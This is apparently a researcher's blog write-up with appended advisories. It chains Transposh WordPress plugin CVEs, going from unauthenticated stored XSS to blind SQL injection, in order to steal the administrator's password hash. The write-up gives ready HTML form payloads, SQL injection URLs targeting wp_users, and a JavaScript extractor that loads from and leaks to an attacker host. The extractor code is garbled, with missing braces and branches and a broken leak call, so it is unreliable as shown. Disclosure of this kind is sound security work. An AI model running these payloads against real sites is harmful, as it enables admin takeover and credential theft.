

CVE-2022-2461: WordPress Transposh: Exploiting a Blind SQL Injection via XSS

The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, This is due to insufficient permissions checking on the ‘tp_translation’ AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.


You probably have read about my recent swamp of CVEs affecting a WordPress plugin called Transposh Translation Filter, which resulted in more than $30,000 in bounties:

  • [CVE-2021-24910] Transposh <= 1.0.7 “tp_tp” Unauthenticated Reflected Cross-Site Scripting
  • [CVE-2021-24911] Transposh <= 1.0.7 “tp_translation” Unauthenticated Stored Cross-Site Scripting
  • [CVE-2021-24912] Transposh <= Multiple Cross-Site Request Forgeries
  • [CVE-2022-2461] Transposh <= “tp_translation” Weak Default Translation Permissions
  • [CVE-2022-2462] Transposh <= “tp_history” Unauthenticated Information Disclosure
  • [CVE-2022-25810] Transposh <= Improper Authorization Allowing Access to Administrative Utilities
  • [CVE-2022-25811] Transposh <= “tp_editor” Multiple Authenticated SQL Injections
  • [CVE-2022-25812] Transposh <= “save_transposh” Missing Logfile Extension Check Leading to Code Injection

Here’s the story about how you could chain three of these CVEs to go from unauthenticated visitor to admin.

Part 1: CVE-2022-2461 - Weak Default Configuration

So the first issue arises when you add Transposh as a plugin to your WordPress site; it comes with a weak default configuration that allows any user (aka Anonymous) to submit new translation entries using the ajax action tp_translation:

This effectively means that an attacker could already influence the (translated) content on a WordPress site, which is shown to all visitors.

Part 2: CVE-2021-24911 - Unauthenticated Stored Cross-Site Scripting

The same ajax action tp_translation can also be used to permanently place arbitrary JavaScript into the Transposh admin backend using the following payload:

    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="xss&lt;script&gt;alert&#40;1337&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />

When an administrator now visits either Transposh’s main dashboard page at /wp-admin/admin.php?page=tp_main or the Translation editor tab at /wp-admin/admin.php?page=tp_editor, then they’ll execute the injected arbitrary JavaScript:

At this point, you can already do a lot of stuff on the backend, but let’s escalate it further by exploiting a seemingly less severe authenticated SQL Injection.

Part 3: CVE-2022-25811 - Authenticated SQL Injections

So this is probably the most exciting part, although the SQL Injections alone only have a CVSS score of 6.8 because they are only exploitable using administrative permissions. Overall, we’re dealing with a blind SQL Injection here, which can be triggered using a simple sleep payload:


This results in a nice delay of the response proving the SQL Injection:

To fully escalate this chain, let’s get to the most interesting part.

How to (Quickly) Exploit a Blind SQL Injection via Cross-Site Scripting****Approach

Have you ever thought about how to exploit a blind SQL Injection via JavaScript? You might have read my previous blog article, where I used a similar bug chain, but with an error-based SQL Injection. That one only required a single injection payload to exfiltrate the admin user’s password, which is trivially easy. However, to exploit a blind SQL Injection, you typically need hundreds, probably thousands of boolean (or time-based) comparisons to exfiltrate data. The goal here is the same: extracting the administrator’s password from the database.

Now, you might think: well, you could use a boolean comparison and iterate over each character of the password. However, since those hashed passwords (WordPress uses the pHpass algorithm to create passwords) are typically 30 characters long (excluding the first four static bytes $P$B) and consist of alphanumeric characters including some special chars (i.e. $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/), going through all the possible ASCII characters from 46 (“.”) to 122 (lower-capital “z”) would require you to send around 76 requests per character which could result in 76*30 = 2280 requests.

This is a lot and will require the victim to stay on the page for quite a while.

So let’s do it a bit smarter with only around 320 requests, which is around 84% fewer requests. Yes, you might still find more optimization potential in my following approach, but I find 84% to be enough here.

Transposh’s Sanitization?!

While doing the source code review to complete this chain, I stumbled upon a useless attempt to filter special characters for the vulnerable order and orderBy parameters. It looks like they decided to only filter for FILTER_SANITIZE_SPECIAL_CHARS which translates to "<>&:

$orderby = (!empty(filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS) : 'timestamp';
$order = (!empty(filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS) : 'desc';

It’s still a limitation, but easy to work around: we’re just going to replace the required comparison characters < and > with a between x and y. We don’t actually care about " and & since the payload doesn’t really require them.

Preparing The Test Cases

The SQL Injection payload that can be used looks like the following (thanks to sqlmap for the initial payload!):


I’ve split the payload up for readability reasons here. Let me explain its core components:

  • The ORD() (together with the MID) walks the user_pass string which is returned by the subquery character by character. This means we’ll get the password char by char. I’ve also added a WHERE id=1 clause to ensure we’re just grabbing the password of WordPress’s user id 1, which is usually the administrator of the instance.
  • The CASE WHEN –> BETWEEN 1 and 122 part validates whether each returned character matches an ordinal between 1 and 122.
  • The THEN –> ELSE part makes the difference in the overall output and the datapoint we will rely on when exploiting this with a Boolean-based approach.

The False Case

Let’s see how we can differentiate the responses to the BETWEEN x and y part. We do already know that the first character of a WordPress password is $ (ASCII 36), so let’s take this to show how the application reacts.

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+100+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) performs a BETWEEN 100 and 122 test which results in the following visible output:

The True Case

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+1+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) in return performs a BETWEEN 1 and 122 check and returns a different visible output:

As you can see on the last screenshot, in the true case, the application will show the Bulk actions dropdown alongside the translated strings. This string will be our differentiator!

How to Reduce the Exploitation Requests from ~2200 to ~300

So we need to find a way not to have to send 76 requests per character - from 46 (.) to 122 (lower-capital z). So let’s do it by approximation. My idea is to use the range of 46-122 and apply some math:

Let’s first define a couple of things:

  • 46: the lowest end of the possible character set –> cur (current) value.
  • 122: the upper end of the possible character set –> max (maximum) value.
  • 0: the previous valid current value –> prev value. Here we need to keep track of the previously true case value to be able to revert the calculation to a working case if we’d encounter a false case. 0 because we don’t know the first valid value.

Doing the initial between check of cur and maxwill always result in a true case (because it’s the entire allowed character set). To narrow it down, we now point cur value to exactly the middle between cur and max using the formula:

cur = cur + (Math.floor((max-cur)/2));

This results in a check of BETWEEN 84 and 122. So we’re checking if the target is located in the upper OR implicitly in the lower half of the range. If this would again result in a true case because the character in probing is in that range, do the same calculation again and narrow it down to the correct character.

However, if we’d encounter a false case because the character is lower than 84, then let’s set the max value to the cur one because we have to instead look into the lower half, and also set cur to the prev value to keep track of it.

Based on this theory and to match the character uppercase C (ASCII: 67), the following would happen:

true: cur:84, prev:46,max:122
true: cur:65, prev:46,max:84
true: cur:74, prev:65,max:84
true: cur:69, prev:65,max:74
true: cur:67, prev:65,max:69
true: cur:68, prev:67,max:69
true: cur:67, prev:67,max:68

Finally, if cur equals prev, we’ve found the correct char. And it took about seven requests to get there, instead of 21 (67-46).

Some JavaScript (Magic)

Honestly, I’m not a JavaScript pro, and there might be ways to optimize it, but here’s my implementation of it, which should work with any blind SQL Injections that you want to chain with an XSS against WordPress:

async function exploit() {
    let result = "$P$B";
    let targetChar = 5;
    let prev = 0;
    let cur = 46;
    let max = 122;
    let requestCount = 0;

    do {
        let url = `/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),${targetChar},1))+BETWEEN+${cur}+AND+${max})+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))`

        const response = await fetch(url)
        const data = await response.text()

        requestCount = requestCount + 1;

        // this is the true/false differentiator
        if(data.includes("Bulk actions"))
            // "true" case
            prev = cur;
            cur = cur + (Math.floor((max-cur)/2));

            //console.log('true: cur:' + cur + ', prev:' + prev + ',max:' + max );

            if(cur === 0 && prev === 0) {
                console.log('Request count: ' + requestCount);

            // this means we've found the correct char
            if(cur === prev) {
                result = result + String.fromCharCode(cur);

                // reset initial values
                prev = 0;
                cur = 20;
                max = 122;

                // proceed with next char
                targetChar = targetChar + 1;

            // "false" case
            // console.log('false: cur:' + cur + ', prev:' + prev + ',max:' + max );

            max = cur;
            cur = prev;
    } while (1)

exploit().then(x => {
    console.log('password: ' + x);

    // let's leak it to somewhere else
    leakUrl = "" + x
    xhr = new XMLHttpRequest();'GET', leakUrl);

Connecting the Dots

Now you could inject a Stored XSS payload like the following, which points a script src to a JavaScript file containing the payload:

    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="xss" />
      <input type="hidden" name="items" value="3" />
      <input type="hidden" name="tk0" value="xss&lt;script&#32;src&#61;&quot;https&#58;&#47;&#47;www&#46;attacker&#46;wf&#47;ff&#46;js&quot;&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />

Trick an admin into visiting the Transposh backend, and finally enjoy your WordPress hash:

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CVE-2022-2516: Vulnerability Advisories - Wordfence

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CVE-2022-3026: Vulnerability Advisories - Wordfence

The WP Users Exporter plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.4.2 via the 'Export Users' functionality. This makes it possible for authenticated attackers, such as a subscriber, to add untrusted input into profile information like First Names that will embed into the exported CSV file triggered by an administrator and can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.


The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue


The Transposh WordPress Translation WordPress plugin before 1.0.8 does not have CSRF check in its tp_translation AJAX action, which could allow attackers to make authorised users add a translation. Given the lack of sanitisation in the tk0 parameter, this could lead to a Stored Cross-Site Scripting issue which will be executed in the context of a logged in admin


The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the tk0 parameter from the tp_translation AJAX action, leading to Stored Cross-Site Scripting, which will trigger in the admin dashboard of the plugin. The minimum role needed to perform such attack depends on the plugin "Who can translate ?" setting.


The Transposh WordPress Translation WordPress plugin before 1.0.8 does not validate its debug settings, which could allow allowing high privilege users such as admin to perform RCE

Transposh WordPress Translation Remote Code Execution

Transposh WordPress Translation versions and below have a "save_transposh" action available at "/wp-admin/admin.php?page=tp_advanced" that does not properly validate the "Log file name" allowing an attacker with the "Administrator" role to specify a .php file as the log destination. Since the log file is stored directly within the "/wp-admin" directory, executing arbitrary PHP code is possible by simply sending a crafted request that gets logged.

Transposh WordPress Translation SQL Injection

Transposh WordPress Translation versions and below have a "tp_editor" page at "/wp-admin/admin.php?page=tp_editor" that is vulnerable to two authenticated, blind SQL injections when user-supplied input to the HTTP GET parameters "order" and "orderby" is processed by the web application.

Transposh WordPress Translation Improper Authorization

Transposh WordPress Translation versions and below do not properly enforce authorization on functionalities available on the plugin's "Utilities" page leading to unauthorized access for all user roles, including "Subscriber".

Transposh WordPress Translation Information Disclosure

Transposh WordPress Translation versions and below have an ajax action called "tp_history" which is intended to return data about who has translated a text given by the "token" parameter. However, the plugin also returns the user's login name as part of the "user_login" attribute. Successful exploits can allow an unauthenticated attacker to leak the WordPress username of translators. If an anonymous user submitted the translation, then the user's IP address is returned.

Transposh WordPress Translation Cross Site Request Forgery

Transposh WordPress Translation versions and below suffer from cross site request forgery vulnerabilities.

Transposh WordPress Translation 1.0.7 Incorrect Authorization

Transposh WordPress Translation versions 1.0.7 and below suffer from an incorrect authorization vulnerability. When installed, Transposh comes with a set of pre-configured options, one of these is the "Who can translate" setting under the "Settings" tab, which by default allows "Anonymous" users to add translations via the plugin's "tp_translation" ajax action. Successful exploits can allow an unauthenticated attacker to add translations to the WordPress site and thereby influence what is actually shown on the site.

Transposh WordPress Translation 1.0.7 Cross Site Scripting

Transposh WordPress Translation versions 1.0.7 and below have an ajax action "tp_translation" which is available to authenticated or unauthenticated users (see CVE-2022-2461) that allows them to submit new translations. Translations submitted this way are shown on the Transposh administrative interface on the pages "tp_main" and "tp_editor". However, since the plugin does not properly validate and sanitize the submitted translation, arbitrary Javascript code can be permanently injected and executed directly within the backend across all users visiting the page with the roles of at least "Subscriber" and up to "Administrator".

Transposh WordPress Translation 1.0.7 Cross Site Scripting

Transposh WordPress Translation versions 1.0.7 and below have an ajax action "tp_translation" which is available to authenticated or unauthenticated users (see CVE-2022-2461) that allows them to submit new translations. Translations submitted this way are shown on the Transposh administrative interface on the pages "tp_main" and "tp_editor". However, since the plugin does not properly validate and sanitize the submitted translation, arbitrary Javascript code can be permanently injected and executed directly within the backend across all users visiting the page with the roles of at least "Subscriber" and up to "Administrator".

Transposh WordPress Translation 1.0.7 Cross Site Scripting

Transposh WordPress Translation versions 1.0.7 and below have an ajax action "tp_tp" that is vulnerable to an unauthenticated/authenticated reflected cross site scripting vulnerability when user-supplied input to the HTTP GET parameter "q" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code onto the same page.

CVE-2022-0210: Vulnerability Advisories - Wordfence

The Random Banner WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping via the category parameter found in the ~/include/models/model.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 4.1.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled.

CVE-2021-42367: Vulnerability Advisories - Wordfence

The Variation Swatches for WooCommerce WordPress plugin is vulnerable to Stored Cross-Site Scripting via several parameters found in the ~/includes/class-menu-page.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.1.1. Due to missing authorization checks on the tawcvs_save_settings function, low-level authenticated users such as subscribers can exploit this vulnerability.

CVE-2021-42367: Vulnerability Advisories - Wordfence

The Variation Swatches for WooCommerce WordPress plugin is vulnerable to Stored Cross-Site Scripting via several parameters found in the ~/includes/class-menu-page.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.1.1. Due to missing authorization checks on the tawcvs_save_settings function, low-level authenticated users such as subscribers can exploit this vulnerability.

CVE-2021-42362: Vulnerability Advisories - Wordfence

The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.

CVE-2021-39348: Vulnerability Advisories - Wordfence

The LearnPress WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping on the $custom_profile parameter found in the ~/inc/admin/views/backend-user-profile.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled. Please note that this is seperate from CVE-2021-24702.

CVE-2021-39348: Vulnerability Advisories - Wordfence

The LearnPress WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping on the $custom_profile parameter found in the ~/inc/admin/views/backend-user-profile.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled. Please note that this is seperate from CVE-2021-24702.

CVE-2021-39327: Vulnerability Advisories - Wordfence

The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.

CVE-2021-34626: Vulnerability Advisories - Wordfence

A vulnerability in the deleteCustomType function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to delete custom extensions added by administrators. This issue affects versions 2.2.3 and prior.

CVE-2021-34627: Vulnerability Advisories - Wordfence

A vulnerability in the getSelectedMimeTypesByRole function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to view custom extensions added by administrators. This issue affects versions 2.2.3 and prior.